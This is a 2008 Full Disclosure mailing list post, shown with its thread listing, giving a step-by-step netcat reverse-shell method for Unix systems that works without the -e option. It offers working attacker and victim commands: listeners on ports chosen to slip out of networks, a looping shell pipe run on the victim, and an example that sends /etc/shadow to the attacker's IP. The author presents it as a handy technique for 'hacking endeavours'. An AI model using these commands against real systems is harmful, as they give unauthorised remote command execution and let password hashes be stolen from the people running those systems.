Full Disclosure mailing list archives
Reverse Shell Without Enabling Netcat's "GAPING_SECURITY_HOLE"
From: 545945 <545945 () gmail com>
Date: Fri, 19 Sep 2008 18:01:23 -0400
Recently a friend of mine asked me a seemingly simple question. What is the easiest method to get a reverse shell from a *nix based system using Netcat. He then added a caveat, that he did not want worry about recompiling the source to enable the "GAPING_SECURITY_HOLE" option that allows you to bind a shell using "-e". My first thought was to say "Dude go check Google and stop bothering me with this piddly shit", however I have in the past had this same discussion with others and trying to construct a Google search string and get meaningful results on this subject can prove very irritating. Because of this I gave in and told him the method I use which is laid out below. I then had the thought that I should post it somewhere else so it was a little easier for the next person to find. I say "somewhere else" because I can only assume that I am not the first person to post this method. While the method below does not provide a "TRUE" interactive shell it is the next best thing and is more than suitable for most hacking endeavours, including simple interactive steps like setting passwords. I know there are other methods out there but I like this one as it provides an easy method without worrying if any particular scripting language was installed or the proper options were compiled in with the default shell. There will undoubtedly be debate on what the best ports are to use and whether or not this is even a recommended way to do things. I chose ports 53 & 80 as they are the ones that I find have the most success of getting out of a network untouched. As with all things any number of factors can get in the way of proper communication using this method. -------- STEP (1) -------- On the attacker host open a terminal window that you want to receive the output of your commands in and run. "nc -k -v -l 80" -------- STEP (2) -------- On the attacker host open a terminal window that you want to enter in your commands and run. "nc -k -v -l 53" -------- STEP (3) -------- On the victim host run. "while true ; do nc <Attacker_IP> 53 | /bin/sh ; done" You should then see a message appear in the window opened in STEP (2) similar to - "Connection from <Victim_IP> port 53 accepted" NOTE: I use the "-k" options and "while loops" in these steps to ensure that if there is any intermittent communication issues I don't have to re-establish any of the sessions. Assuming that there are no communication issues like firewalls, routing, DNS, PEBCAK errors, etc...getting in the way, then the command you entered in STEP (3) will connect to the session started in STEP (2). "Great now what?" you ask. Well all you do is enter the commands you want to run in the STEP (2) window using the formatting below and the output will display in the window opened for STEP (1) Syntax : <command> | nc <Attacker_IP> 80 Example: cat /etc/shadow | nc 10.10.10.10 80 There are lots of variations on this using multiple hosts and single ports but I leave that up to you to experiment. That's it and happy hunting... --545945
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Reverse Shell Without Enabling Netcat's "GAPING_SECURITY_HOLE" 545945 (Sep 19)
- Re: Reverse Shell Without Enabling Netcat's "GAPING_SECURITY_HOLE" Kurt Buff (Sep 19)
- Re: Reverse Shell Without Enabling Netcat's "GAPING_SECURITY_HOLE" 545945 (Sep 19)
- Re: Reverse Shell Without Enabling Netcat's "GAPING_SECURITY_HOLE" Davide Guerri (Sep 19)
- Re: Reverse Shell Without Enabling Netcat's "GAPING_SECURITY_HOLE" Robert McKay (Sep 19)
- Re: Reverse Shell Without Enabling Netcat's "GAPING_SECURITY_HOLE" 545945 (Sep 19)
- Re: Reverse Shell Without Enabling Netcat's "GAPING_SECURITY_HOLE" Kurt Buff (Sep 19)